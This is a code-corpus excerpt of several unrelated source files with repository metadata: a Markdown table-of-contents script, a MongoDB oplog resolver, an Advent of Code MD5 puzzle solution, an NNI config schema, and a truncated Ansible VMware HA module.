                header_list = get_headers(md_text, params['header_priority'])
                table_of_contents_lines = create_table_of_contents(header_list)
                if table_of_contents_lines is None:
                    print('[WARNING]: {} has no headers to create a Table of Contents, Ignoring...'.format(filepath))
                    continue
                if (params['write']):
                    print('Creating a Table of Contents for \'{}\''.format(filepath))
                md_text_toc_pairs.append((md_text, table_of_contents_lines))
                valid_filepaths.append(filepath)
        except OSError:
            print('[ERROR]: {} doesn\'t exist or cannot be read, Ignoring...'.format(filepath))
    return md_text_toc_pairs, valid_filepaths
def find_note_contents_start(md_text_lines):
    """Return the index of the first line after the title that contains no
    tags; if every line after the title contains tags, return
    ``len(md_text_lines)``.

    Bear notes often carry '#tag' lines directly under the title, and the
    Table of Contents must be inserted after them.
    """
    tag_pattern = re.compile(r'((?<=^)|(?<=\n|\r| ))(#[^#\r\n]+#|#[^#\r\n ]+)')
    # Start at 1 to skip the title line.
    return next(
        (i for i in range(1, len(md_text_lines)) if tag_pattern.search(md_text_lines[i]) is None),
        len(md_text_lines),
    )
def convert_bear_timestamp(datetime=None):
    """Return 'datetime' minus 31 years as a Unix timestamp, defaulting to now.

    For some weird reason Bear's timestamps are 31 years behind, hence the
    offset. Bug fix: the previous signature used ``datetime=dt.datetime.now()``,
    which froze "now" at import time because Python evaluates default
    arguments exactly once; the default is now computed per call.
    """
    if datetime is None:
        datetime = dt.datetime.now()
    return (datetime - relativedelta(years=31)).timestamp()
def main():
    """Generate and (optionally) write a Table of Contents for each target.

    Bug fix: '--type gitlab' is an accepted argparse choice, but both
    dispatch points below only tested for 'github', so gitlab runs crashed
    (iterating None) or silently wrote nothing. gitlab now shares the
    file-based code path with github.
    """
    md_text_toc_pairs = None
    identifiers = None  # Either Bear Note UUIDs or File Paths
    if (params['type'] == 'bear'):
        md_text_toc_pairs, identifiers = create_table_of_contents_bear()
    else:
        # 'github' and 'gitlab' both operate on local Markdown files.
        md_text_toc_pairs, identifiers = create_table_of_contents_github_or_gitlab()
    for i, (md_text, toc_lines) in enumerate(md_text_toc_pairs):
        if (params['write']):
            # Inject Table of Contents (Title, \n, Table of Contents, \n, Content)
            text_list = md_text.splitlines()
            content_start = find_note_contents_start(text_list)
            updated_text_list = [*text_list[:content_start], '', *toc_lines, '', *text_list[content_start:]]
            # Regex extracts anchor text from anchors for the note subtitle.
            # NOTE: There are edge cases with code blocks, bold, strikethroughs, etc...
            subtitle_text = re.sub(r'\[([^\[\]]+)\]\([^\(\)]+\)', r'\1', ' '.join(updated_text_list[1:]))
            updated_md_text = '\n'.join(updated_text_list)
            if (params['type'] == 'bear'):
                # Update Note with Table of Contents
                update_query = "UPDATE `ZSFNOTE` SET `ZSUBTITLE`=?, `ZTEXT`=?, `ZMODIFICATIONDATE`=? WHERE `ZUNIQUEIDENTIFIER`=?"
                cursor.execute(update_query, (subtitle_text, updated_md_text, convert_bear_timestamp(), identifiers[i]))
                conn.commit()
            else:
                # Update the Markdown file in place (github and gitlab).
                with open(identifiers[i], 'w') as file:
                    file.write(updated_md_text)
        else:
            print('\n'.join(toc_lines) + '\n')
if __name__ == '__main__':
    main()
# NOTE(review): this epilogue sits OUTSIDE the __main__ guard, so it also
# runs (and closes the Bear DB connection) when the module is imported —
# confirm whether it should be moved under the guard.
if params['type'] == 'bear' and params['write']:
    print('==================== [DONE] ====================')
    print('[WARNING]: There still might be syncing issues with iCloud, for a precautionary measure, edit the note again.')
    print('To see your changes, please restart Bear!')
    conn.close()
# DEPRECATED
# def create_header_list(header_priority_pairs):
# # Base Case
# if (len(header_priority_pairs) == 0):
# return []
#
# header_list = []
# current_header = None
# current_priority = None
# current_subheaders = []
#
# # Go through each header and check if the header's priority is greater than the next's
# for i in range(len(header_priority_pairs) - 1):
# header, priority = header_priority_pairs[i]
# next_header, next_priority = header_priority_pairs[i + 1]
#
# if current_header is None:
# current_header = header
# current_priority = priority
#
# # Append Sub-header
# current_subheaders.append(header_priority_pairs[i + 1])
#
# # If we see a same ranked header (H1 and H1) or reaches the end
# if current_priority == next_priority or i + 1 == len(header_priority_pairs) - 1:
# header_list.append((current_header, create_header_list(current_subheaders)))
#
# # Reset Current Header
# current_header = None
# current_priority = None
# current_subheaders = []
#
# return header_list
| 37.986702 | 129 | 0.636981 |
ace95e78ffe24e7909528c9e784e49039bbb59ab | 6,392 | py | Python | mongodb/mongodb_consistent_backup/official/mongodb_consistent_backup/Oplog/Resolver/Resolver.py | smthkissinger/docker-images | 35e868295d04fa780325ada4168381f1e80e8fe4 | [
"BSD-3-Clause"
] | 63 | 2018-02-04T03:31:22.000Z | 2022-03-07T08:27:39.000Z | mongodb/mongodb_consistent_backup/official/mongodb_consistent_backup/Oplog/Resolver/Resolver.py | smthkissinger/docker-images | 35e868295d04fa780325ada4168381f1e80e8fe4 | [
"BSD-3-Clause"
] | 3 | 2020-06-15T03:41:03.000Z | 2020-06-15T03:41:04.000Z | mongodb/mongodb_consistent_backup/official/mongodb_consistent_backup/Oplog/Resolver/Resolver.py | smthkissinger/docker-images | 35e868295d04fa780325ada4168381f1e80e8fe4 | [
"BSD-3-Clause"
] | 40 | 2018-01-22T16:31:16.000Z | 2022-03-08T04:40:42.000Z | import logging
# Skip bson in requirements , pymongo provides
# noinspection PyPackageRequirements
from bson.timestamp import Timestamp
from copy_reg import pickle
from multiprocessing import Pool, TimeoutError
from types import MethodType
from ResolverThread import ResolverThread
from mongodb_consistent_backup.Common import MongoUri
from mongodb_consistent_backup.Errors import Error, OperationError
from mongodb_consistent_backup.Oplog import OplogState
from mongodb_consistent_backup.Pipeline import Task
# Allows pooled .apply_async()s to work on Class-methods:
def _reduce_method(m):
    # Python 2 only: im_self/im_class/im_func are the Python 2 method
    # attributes. Reduces a (possibly bound) method to a picklable
    # (getattr, (owner, name)) pair so multiprocessing pools can ship it.
    if m.im_self is None:
        return getattr, (m.im_class, m.im_func.func_name)
    else:
        return getattr, (m.im_self, m.im_func.func_name)
# Register the reducer for all method objects (see comment above the def).
pickle(MethodType, _reduce_method)
class Resolver(Task):
    """Pipeline task that resolves tailed oplogs against backup oplogs,
    one shard per pooled ResolverThread.

    NOTE: this module is Python 2 code (``except Exception, e`` syntax).
    """

    def __init__(self, manager, config, timer, base_dir, backup_dir, tailed_oplogs, backup_oplogs):
        super(Resolver, self).__init__(self.__class__.__name__, manager, config, timer, base_dir, backup_dir)
        # Per-shard oplog metadata dicts keyed by shard name.
        self.tailed_oplogs = tailed_oplogs
        self.backup_oplogs = backup_oplogs
        self.compression_supported = ['none', 'gzip']
        self.resolver_summary = {}
        self.resolver_state = {}
        self.running = False
        self.stopped = False
        self.completed = False
        self._pool = None
        # Names of shards whose resolver thread is still outstanding.
        self._pooled = []
        # AsyncResult objects keyed by thread name (the shard URI string).
        self._results = {}
        self.threads(self.config.oplog.resolver.threads)
        try:
            self._pool = Pool(processes=self.threads())
        except Exception, e:
            logging.fatal("Could not start oplog resolver pool! Error: %s" % e)
            raise Error(e)

    def close(self):
        """Terminate the worker pool, but only after the task has stopped."""
        if self._pool and self.stopped:
            logging.debug("Stopping all oplog resolver threads")
            self._pool.terminate()
            logging.info("Stopped all oplog resolver threads")
        self.stopped = True

    def get_backup_end_max_ts(self):
        """Return the newest 'last_ts' across all backup oplogs (or None)."""
        end_ts = None
        for shard in self.backup_oplogs:
            instance = self.backup_oplogs[shard]
            if 'last_ts' in instance and instance['last_ts'] is not None:
                last_ts = instance['last_ts']
                if end_ts is None or last_ts > end_ts:
                    end_ts = last_ts
        return end_ts

    def get_consistent_end_ts(self):
        """Return the consistent-cut end timestamp for all shards.

        Takes the minimum 'last_ts' across the tailed oplogs, bumped up to
        the newest backup timestamp if the tail ended earlier, plus one
        second (increment reset to 0).
        """
        end_ts = None
        bkp_end_ts = self.get_backup_end_max_ts()
        for shard in self.tailed_oplogs:
            instance = self.tailed_oplogs[shard]
            if 'last_ts' in instance and instance['last_ts'] is not None:
                last_ts = instance['last_ts']
                if end_ts is None or last_ts < end_ts:
                    end_ts = last_ts
                if last_ts < bkp_end_ts:
                    end_ts = bkp_end_ts
        return Timestamp(end_ts.time + 1, 0)

    def done(self, done_uri):
        """Pool callback: mark the named resolver thread as finished."""
        if done_uri in self._pooled:
            logging.debug("Resolving completed for: %s" % done_uri)
            self._pooled.remove(done_uri)
        else:
            raise OperationError("Unexpected response from resolver thread: %s" % done_uri)

    def wait(self, max_wait_secs=6 * 3600, poll_secs=2):
        """Block until all pooled resolver threads complete.

        Polls each outstanding AsyncResult with a short timeout; the done()
        callback removes finished names from self._pooled.
        NOTE(review): the OperationError message below contains an unfilled
        '%i' placeholder — max_wait_secs is never interpolated.
        """
        if len(self._pooled) > 0:
            waited_secs = 0
            self._pool.close()
            while len(self._pooled):
                logging.debug("Waiting for %i oplog resolver thread(s) to stop" % len(self._pooled))
                try:
                    for thread_name in self._pooled:
                        thread = self._results[thread_name]
                        thread.get(poll_secs)
                except TimeoutError:
                    if waited_secs < max_wait_secs:
                        waited_secs += poll_secs
                    else:
                        raise OperationError("Waited more than %i seconds for Oplog resolver! I will assume there is a problem and exit")

    def run(self):
        """Dispatch one ResolverThread per shard, wait, and return a
        per-shard summary dict.

        NOTE(review): if an exception is raised before the loop assigns
        ``uri``, the except handler's log line references an unbound name.
        """
        try:
            logging.info("Resolving oplogs (options: threads=%s, compression=%s)" % (self.threads(), self.compression()))
            self.timer.start(self.timer_name)
            self.running = True
            for shard in self.backup_oplogs:
                backup_oplog = self.backup_oplogs[shard]
                self.resolver_state[shard] = OplogState(self.manager, None, backup_oplog['file'])
                uri = MongoUri(backup_oplog['uri']).get()
                if shard in self.tailed_oplogs:
                    tailed_oplog = self.tailed_oplogs[shard]
                    if backup_oplog['last_ts'] is None and tailed_oplog['last_ts'] is None:
                        logging.info("No oplog changes to resolve for %s" % uri)
                    elif backup_oplog['last_ts'] > tailed_oplog['last_ts']:
                        logging.fatal(
                            "Backup oplog is newer than the tailed oplog! This situation is unsupported. Please retry backup")
                        raise OperationError("Backup oplog is newer than the tailed oplog!")
                    else:
                        thread_name = uri.str()
                        logging.debug("Starting ResolverThread: %s" % thread_name)
                        # .run is picklable thanks to the _reduce_method
                        # registration at module level.
                        self._results[thread_name] = self._pool.apply_async(ResolverThread(
                            self.config.dump(),
                            self.resolver_state[shard],
                            uri,
                            tailed_oplog.copy(),
                            backup_oplog.copy(),
                            self.get_consistent_end_ts(),
                            self.compression()
                        ).run, callback=self.done)
                        self._pooled.append(thread_name)
                else:
                    logging.info("No tailed oplog for host %s" % uri)
            self.wait()
            self.completed = True
            logging.info("Oplog resolving completed in %.2f seconds" % self.timer.duration(self.timer_name))
        except Exception, e:
            logging.error("Resolver failed for %s: %s" % (uri, e))
            raise e
        finally:
            self.timer.stop(self.timer_name)
            self.running = False
            self.stopped = True
        for shard in self.resolver_state:
            self.resolver_summary[shard] = self.resolver_state[shard].get()
        return self.resolver_summary
| 41.777778 | 137 | 0.581352 |
ace960e11ee3abd4f5e18ce9c586091b0055bb4e | 2,450 | py | Python | 2015/python/day-04.py | tadhg-ohiggins/advent-of-code | d0f113955940e69cbe0953607f62862f8a8bb830 | [
"CC0-1.0"
] | 1 | 2021-12-04T18:09:44.000Z | 2021-12-04T18:09:44.000Z | 2015/python/day-04.py | tadhg-ohiggins/advent-of-code | d0f113955940e69cbe0953607f62862f8a8bb830 | [
"CC0-1.0"
] | null | null | null | 2015/python/day-04.py | tadhg-ohiggins/advent-of-code | d0f113955940e69cbe0953607f62862f8a8bb830 | [
"CC0-1.0"
] | null | null | null | import hashlib
from tutils import partial
from tutils import count
from tutils import Any
from tutils import compose_left
""" END HELPER FUNCTIONS """
# Advent of Code 2015, day 4 configuration and known-good answers.
DAY = "04"
INPUT, TEST = f"input-{DAY}.txt", f"test-input-{DAY}.txt"
# Expected answers for the test input (none provided for this puzzle).
TA1 = None
TA2 = None
# Expected answers for the real input, asserted in cli_main().
ANSWER1 = 282749
ANSWER2 = 9962624
def process_one(data: str) -> int:
    """Part one: lowest suffix whose MD5 hash starts with five zeroes."""
    return findzeroes(data, "0" * 5)
def findzeroes(key, target):
    """Return the lowest non-negative integer n such that md5(key + str(n))
    starts with `target`, built as a lazy functional pipeline over count().
    """
    # Hash one candidate number with the fixed key.
    myhash = partial(mkhash, key)
    # Lazily map candidates to their hashes.
    lazy_hashes = partial(map, myhash)
    # Keep only (index, hash) pairs whose hash starts with the target prefix.
    find_match = partial(filter, lambda x: x[1].startswith(target))
    generator = compose_left(lazy_hashes, enumerate, find_match)(count())
    match = next(generator)
    return match[0]
def xfindzeroes(key, target):
    """Imperative variant of findzeroes: smallest positive integer whose
    MD5 digest of key+number starts with `target`.
    """
    # This original is rather more readable than the functional version...
    suffix = 0
    digest = ""
    while not digest.startswith(target):
        suffix += 1
        digest = mkhash(key, suffix)
    return suffix
def mkhash(key, num):
    """Return the hex MD5 digest of `key` concatenated with `num`."""
    return hashlib.md5(f"{key}{num}".encode()).hexdigest()
def process_two(data: Any) -> Any:
    """Part two: lowest suffix whose MD5 hash starts with six zeroes."""
    return findzeroes(data, "0" * 6)
def cli_main() -> None:
    """Solve both parts for the hard-coded puzzle input and print answers.

    NOTE: this brute-forces millions of MD5 hashes, so it takes a while.
    The asserts pin the known-correct answers; they are stripped under -O.
    """
    data = "yzbqklnj"
    answer_one = process_one(data)
    assert answer_one == ANSWER1
    print("Answer one:", answer_one)
    answer_two = process_two(data)
    assert answer_two == ANSWER2
    print("Answer two:", answer_two)


if __name__ == "__main__":
    cli_main()
"""
--- Day 4: The Ideal Stocking Stuffer ---
Santa needs help mining some AdventCoins (very similar to bitcoins) to use as
gifts for all the economically forward-thinking little girls and boys.
To do this, he needs to find MD5 hashes which, in hexadecimal, start with at
least five zeroes. The input to the MD5 hash is some secret key (your puzzle
input, given below) followed by a number in decimal. To mine AdventCoins, you
must find Santa the lowest positive number (no leading zeroes: 1, 2, 3, ...)
that produces such a hash.
For example:
If your secret key is abcdef, the answer is 609043, because the MD5 hash of
abcdef609043 starts with five zeroes (000001dbbfa...), and it is the lowest
such number to do so.
If your secret key is pqrstuv, the lowest number it combines with to make
an MD5 hash starting with five zeroes is 1048970; that is, the MD5 hash of
pqrstuv1048970 looks like 000006136ef....
Your puzzle answer was 282749.
--- Part Two ---
Now find one that starts with six zeroes.
Your puzzle answer was 9962624.
"""
| 26.06383 | 79 | 0.699184 |
ace9621a5abcb3661411ef69ff74e05610153515 | 3,739 | py | Python | tools/nnicmd/config_schema.py | xwyangjshb/nni | 1388d763b203cf9da9b747f06d8f1700679bd7d1 | [
"MIT"
] | 1 | 2018-10-14T03:37:19.000Z | 2018-10-14T03:37:19.000Z | tools/nnicmd/config_schema.py | xwyangjshb/nni | 1388d763b203cf9da9b747f06d8f1700679bd7d1 | [
"MIT"
] | null | null | null | tools/nnicmd/config_schema.py | xwyangjshb/nni | 1388d763b203cf9da9b747f06d8f1700679bd7d1 | [
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge,
# to any person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and
# to permit persons to whom the Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
# BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import os
from schema import Schema, And, Use, Optional, Regex, Or
common_schema = {
'authorName': str,
'experimentName': str,
Optional('description'): str,
'trialConcurrency': And(int, lambda n: 1 <=n <= 999999),
Optional('maxExecDuration'): Regex(r'^[1-9][0-9]*[s|m|h|d]$'),
Optional('maxTrialNum'): And(int, lambda x: 1 <= x <= 99999),
'trainingServicePlatform': And(str, lambda x: x in ['remote', 'local', 'pai']),
Optional('searchSpacePath'): os.path.exists,
Optional('multiPhase'): bool,
'useAnnotation': bool,
'tuner': Or({
'builtinTunerName': Or('TPE', 'Random', 'Anneal', 'Evolution', 'SMAC', 'BatchTuner'),
'classArgs': {
'optimize_mode': Or('maximize', 'minimize'),
Optional('speed'): int
},
Optional('gpuNum'): And(int, lambda x: 0 <= x <= 99999),
},{
'codeDir': os.path.exists,
'classFileName': str,
'className': str,
Optional('classArgs'): dict,
Optional('gpuNum'): And(int, lambda x: 0 <= x <= 99999),
}),
Optional('assessor'): Or({
'builtinAssessorName': lambda x: x in ['Medianstop'],
'classArgs': {
'optimize_mode': lambda x: x in ['maximize', 'minimize']},
'gpuNum': And(int, lambda x: 0 <= x <= 99999)
},{
'codeDir': os.path.exists,
'classFileName': str,
'className': str,
Optional('classArgs'): dict,
Optional('gpuNum'): And(int, lambda x: 0 <= x <= 99999),
}),
}
common_trial_schema = {
'trial':{
'command': str,
'codeDir': os.path.exists,
'gpuNum': And(int, lambda x: 0 <= x <= 99999)
}
}
pai_trial_schema = {
'trial':{
'command': str,
'codeDir': os.path.exists,
'gpuNum': And(int, lambda x: 0 <= x <= 99999),
'cpuNum': And(int, lambda x: 0 <= x <= 99999),
'memoryMB': int,
'image': str,
Optional('dataDir'): Regex(r'hdfs://(([0-9]{1,3}.){3}[0-9]{1,3})(:[0-9]{2,5})?(/.*)?'),
Optional('outputDir'): Regex(r'hdfs://(([0-9]{1,3}.){3}[0-9]{1,3})(:[0-9]{2,5})?(/.*)?')
}
}
pai_config_schema = {
'paiConfig':{
'userName': str,
'passWord': str,
'host': str
}
}
machine_list_schima = {
Optional('machineList'):[Or({
'ip': str,
'port': And(int, lambda x: 0 < x < 65535),
'username': str,
'passwd': str
},{
'ip': str,
'port': And(int, lambda x: 0 < x < 65535),
'username': str,
'sshKeyPath': os.path.exists,
Optional('passphrase'): str
})]
}
LOCAL_CONFIG_SCHEMA = Schema({**common_schema, **common_trial_schema})
REMOTE_CONFIG_SCHEMA = Schema({**common_schema, **common_trial_schema, **machine_list_schima})
PAI_CONFIG_SCHEMA = Schema({**common_schema, **pai_trial_schema, **pai_config_schema}) | 33.684685 | 100 | 0.651244 |
ace9632d036f35e0d6a05f25ad7b982356165947 | 23,740 | py | Python | lib/python3.8/site-packages/ansible_collections/community/vmware/plugins/modules/vmware_cluster_ha.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | lib/python3.8/site-packages/ansible_collections/community/vmware/plugins/modules/vmware_cluster_ha.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | lib/python3.8/site-packages/ansible_collections/community/vmware/plugins/modules/vmware_cluster_ha.py | cjsteel/python3-venv-ansible-2.10.5 | c95395c4cae844dc66fddde9b4343966f4b2ecd5 | [
"Apache-1.1"
] | null | null | null | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Joseph Callen <jcallen () csc.com>
# Copyright: (c) 2018, Ansible Project
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
DOCUMENTATION = r'''
---
module: vmware_cluster_ha
short_description: Manage High Availability (HA) on VMware vSphere clusters
description:
- Manages HA configuration on VMware vSphere clusters.
- All values and VMware object names are case sensitive.
author:
- Joseph Callen (@jcpowermac)
- Abhijeet Kasurde (@Akasurde)
requirements:
- Tested on ESXi 5.5 and 6.5.
- PyVmomi installed.
options:
cluster_name:
description:
- The name of the cluster to be managed.
type: str
required: true
datacenter:
description:
- The name of the datacenter.
type: str
required: true
aliases: [ datacenter_name ]
enable_ha:
description:
- Whether to enable HA.
type: bool
default: false
ha_host_monitoring:
description:
- Whether HA restarts virtual machines after a host fails.
- If set to C(enabled), HA restarts virtual machines after a host fails.
- If set to C(disabled), HA does not restart virtual machines after a host fails.
- If C(enable_ha) is set to C(False), then this value is ignored.
type: str
choices: [ 'enabled', 'disabled' ]
default: 'enabled'
ha_vm_monitoring:
description:
- State of virtual machine health monitoring service.
- If set to C(vmAndAppMonitoring), HA response to both virtual machine and application heartbeat failure.
- If set to C(vmMonitoringDisabled), virtual machine health monitoring is disabled.
- If set to C(vmMonitoringOnly), HA response to virtual machine heartbeat failure.
- If C(enable_ha) is set to C(False), then this value is ignored.
type: str
choices: ['vmAndAppMonitoring', 'vmMonitoringOnly', 'vmMonitoringDisabled']
default: 'vmMonitoringDisabled'
host_isolation_response:
description:
      - Indicates whether or not VMs should be powered off if a host determines that it is isolated from the rest of the compute resource.
- If set to C(none), do not power off VMs in the event of a host network isolation.
- If set to C(powerOff), power off VMs in the event of a host network isolation.
- If set to C(shutdown), shut down VMs guest operating system in the event of a host network isolation.
type: str
choices: ['none', 'powerOff', 'shutdown']
default: 'none'
slot_based_admission_control:
description:
- Configure slot based admission control policy.
- C(slot_based_admission_control), C(reservation_based_admission_control) and C(failover_host_admission_control) are mutually exclusive.
suboptions:
failover_level:
description:
- Number of host failures that should be tolerated.
type: int
required: true
type: dict
reservation_based_admission_control:
description:
- Configure reservation based admission control policy.
- C(slot_based_admission_control), C(reservation_based_admission_control) and C(failover_host_admission_control) are mutually exclusive.
suboptions:
failover_level:
description:
- Number of host failures that should be tolerated.
type: int
required: true
auto_compute_percentages:
description:
- By default, C(failover_level) is used to calculate C(cpu_failover_resources_percent) and C(memory_failover_resources_percent).
If a user wants to override the percentage values, he has to set this field to false.
type: bool
default: true
cpu_failover_resources_percent:
description:
- Percentage of CPU resources in the cluster to reserve for failover.
Ignored if C(auto_compute_percentages) is not set to false.
type: int
default: 50
memory_failover_resources_percent:
description:
- Percentage of memory resources in the cluster to reserve for failover.
Ignored if C(auto_compute_percentages) is not set to false.
type: int
default: 50
type: dict
failover_host_admission_control:
description:
- Configure dedicated failover hosts.
- C(slot_based_admission_control), C(reservation_based_admission_control) and C(failover_host_admission_control) are mutually exclusive.
suboptions:
failover_hosts:
description:
- List of dedicated failover hosts.
type: list
required: true
elements: str
type: dict
ha_vm_failure_interval:
description:
- The number of seconds after which virtual machine is declared as failed
if no heartbeat has been received.
- This setting is only valid if C(ha_vm_monitoring) is set to, either C(vmAndAppMonitoring) or C(vmMonitoringOnly).
- Unit is seconds.
type: int
default: 30
ha_vm_min_up_time:
description:
- The number of seconds for the virtual machine's heartbeats to stabilize after
the virtual machine has been powered on.
- Valid only when I(ha_vm_monitoring) is set to either C(vmAndAppMonitoring) or C(vmMonitoringOnly).
- Unit is seconds.
type: int
default: 120
ha_vm_max_failures:
description:
- Maximum number of failures and automated resets allowed during the time
that C(ha_vm_max_failure_window) specifies.
- Valid only when I(ha_vm_monitoring) is set to either C(vmAndAppMonitoring) or C(vmMonitoringOnly).
type: int
default: 3
ha_vm_max_failure_window:
description:
- The number of seconds for the window during which up to C(ha_vm_max_failures) resets
can occur before automated responses stop.
- Valid only when I(ha_vm_monitoring) is set to either C(vmAndAppMonitoring) or C(vmMonitoringOnly).
- Unit is seconds.
- Default specifies no failure window.
type: int
default: -1
ha_restart_priority:
description:
- Priority HA gives to a virtual machine if sufficient capacity is not available
to power on all failed virtual machines.
- Valid only if I(ha_vm_monitoring) is set to either C(vmAndAppMonitoring) or C(vmMonitoringOnly).
- If set to C(disabled), then HA is disabled for this virtual machine.
- If set to C(high), then virtual machine with this priority have a higher chance of powering on after a failure,
when there is insufficient capacity on hosts to meet all virtual machine needs.
- If set to C(medium), then virtual machine with this priority have an intermediate chance of powering on after a failure,
when there is insufficient capacity on hosts to meet all virtual machine needs.
- If set to C(low), then virtual machine with this priority have a lower chance of powering on after a failure,
when there is insufficient capacity on hosts to meet all virtual machine needs.
type: str
default: 'medium'
choices: [ 'disabled', 'high', 'low', 'medium' ]
advanced_settings:
description:
- A dictionary of advanced HA settings.
default: {}
type: dict
apd_response:
description:
- VM storage protection setting for storage failures categorized as All Paths Down (APD).
type: str
default: 'warning'
choices: [ 'disabled', 'warning', 'restartConservative', 'restartAggressive' ]
version_added: '1.4.0'
pdl_response:
description:
      - VM storage protection setting for storage failures categorized as Permanent Device Loss (PDL).
type: str
default: 'warning'
choices: [ 'disabled', 'warning', 'restartAggressive' ]
version_added: '1.4.0'
extends_documentation_fragment:
- community.vmware.vmware.documentation
'''
EXAMPLES = r'''
- name: Enable HA without admission control
community.vmware.vmware_cluster_ha:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
datacenter_name: datacenter
cluster_name: cluster
enable_ha: true
delegate_to: localhost
- name: Enable HA and VM monitoring without admission control
community.vmware.vmware_cluster_ha:
hostname: "{{ vcenter_hostname }}"
username: "{{ vcenter_username }}"
password: "{{ vcenter_password }}"
datacenter_name: DC0
cluster_name: "{{ cluster_name }}"
enable_ha: True
ha_vm_monitoring: vmMonitoringOnly
delegate_to: localhost
- name: Enable HA with admission control reserving 50% of resources for HA
community.vmware.vmware_cluster_ha:
hostname: '{{ vcenter_hostname }}'
username: '{{ vcenter_username }}'
password: '{{ vcenter_password }}'
datacenter_name: datacenter
cluster_name: cluster
enable_ha: true
reservation_based_admission_control:
auto_compute_percentages: False
failover_level: 1
cpu_failover_resources_percent: 50
memory_failover_resources_percent: 50
delegate_to: localhost
'''
RETURN = r'''#
'''
try:
from pyVmomi import vim, vmodl
except ImportError:
pass
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.community.vmware.plugins.module_utils.vmware import (
PyVmomi,
TaskError,
find_datacenter_by_name,
vmware_argument_spec,
wait_for_task,
option_diff,
)
from ansible.module_utils._text import to_native
class VMwareCluster(PyVmomi):
    """Apply the requested vSphere HA (DAS) configuration to a cluster."""
    def __init__(self, module):
        """Resolve the datacenter/cluster and precompute the desired HA state."""
        super(VMwareCluster, self).__init__(module)
        self.cluster_name = module.params['cluster_name']
        self.datacenter_name = module.params['datacenter']
        self.enable_ha = module.params['enable_ha']
        self.datacenter = None
        self.cluster = None
        # Map the module's string choice onto the pyVmomi enum value.
        self.host_isolation_response = getattr(vim.cluster.DasVmSettings.IsolationResponse, self.params.get('host_isolation_response'))
        # Admission control is considered enabled iff HA is enabled and any of
        # the three (mutually exclusive) policy dicts was supplied.
        if self.enable_ha and (
            self.params.get("slot_based_admission_control")
            or self.params.get("reservation_based_admission_control")
            or self.params.get("failover_host_admission_control")
        ):
            self.ha_admission_control = True
        else:
            self.ha_admission_control = False
        self.datacenter = find_datacenter_by_name(self.content, self.datacenter_name)
        if self.datacenter is None:
            self.module.fail_json(msg="Datacenter %s does not exist." % self.datacenter_name)
        self.cluster = self.find_cluster_by_name(cluster_name=self.cluster_name, datacenter_name=self.datacenter)
        if self.cluster is None:
            self.module.fail_json(msg="Cluster %s does not exist." % self.cluster_name)
        self.advanced_settings = self.params.get('advanced_settings')
        if self.advanced_settings:
            # Keep only the advanced options that differ from the live cluster
            # configuration, so an unchanged dict reports no diff.
            self.changed_advanced_settings = option_diff(self.advanced_settings, self.cluster.configurationEx.dasConfig.option, False)
        else:
            self.changed_advanced_settings = None
    def get_failover_hosts(self):
        """
        Get failover hosts for failover_host_admission_control policy
        Returns: List of ESXi hosts sorted by name
        """
        policy = self.params.get('failover_host_admission_control')
        hosts = []
        all_hosts = dict((h.name, h) for h in self.get_all_hosts_by_cluster(self.cluster_name))
        for host in policy.get('failover_hosts'):
            if host in all_hosts:
                hosts.append(all_hosts.get(host))
            else:
                self.module.fail_json(msg="Host %s is not a member of cluster %s." % (host, self.cluster_name))
        # Sort by name so comparisons against the live config are stable.
        hosts.sort(key=lambda h: h.name)
        return hosts
    def check_ha_config_diff(self):
        """
        Check HA configuration diff
        Returns: True if there is diff, else False
        """
        das_config = self.cluster.configurationEx.dasConfig
        if das_config.enabled != self.enable_ha:
            return True
        # Only compare the detailed settings when HA is (to be) enabled.
        if self.enable_ha and (
            das_config.vmMonitoring != self.params.get("ha_vm_monitoring")
            or das_config.hostMonitoring != self.params.get("ha_host_monitoring")
            or das_config.admissionControlEnabled != self.ha_admission_control
            or das_config.defaultVmSettings.restartPriority
            != self.params.get("ha_restart_priority")
            or das_config.defaultVmSettings.isolationResponse
            != self.host_isolation_response
            or das_config.defaultVmSettings.vmToolsMonitoringSettings.vmMonitoring
            != self.params.get("ha_vm_monitoring")
            or das_config.defaultVmSettings.vmToolsMonitoringSettings.failureInterval
            != self.params.get("ha_vm_failure_interval")
            or das_config.defaultVmSettings.vmToolsMonitoringSettings.minUpTime
            != self.params.get("ha_vm_min_up_time")
            or das_config.defaultVmSettings.vmToolsMonitoringSettings.maxFailures
            != self.params.get("ha_vm_max_failures")
            or das_config.defaultVmSettings.vmToolsMonitoringSettings.maxFailureWindow
            != self.params.get("ha_vm_max_failure_window")
            or das_config.defaultVmSettings.vmComponentProtectionSettings.vmStorageProtectionForAPD
            != self.params.get("apd_response")
            or das_config.defaultVmSettings.vmComponentProtectionSettings.vmStorageProtectionForPDL
            != self.params.get("pdl_response")
        ):
            return True
        if self.ha_admission_control:
            if self.params.get('slot_based_admission_control'):
                policy = self.params.get('slot_based_admission_control')
                if not isinstance(das_config.admissionControlPolicy, vim.cluster.FailoverLevelAdmissionControlPolicy) or \
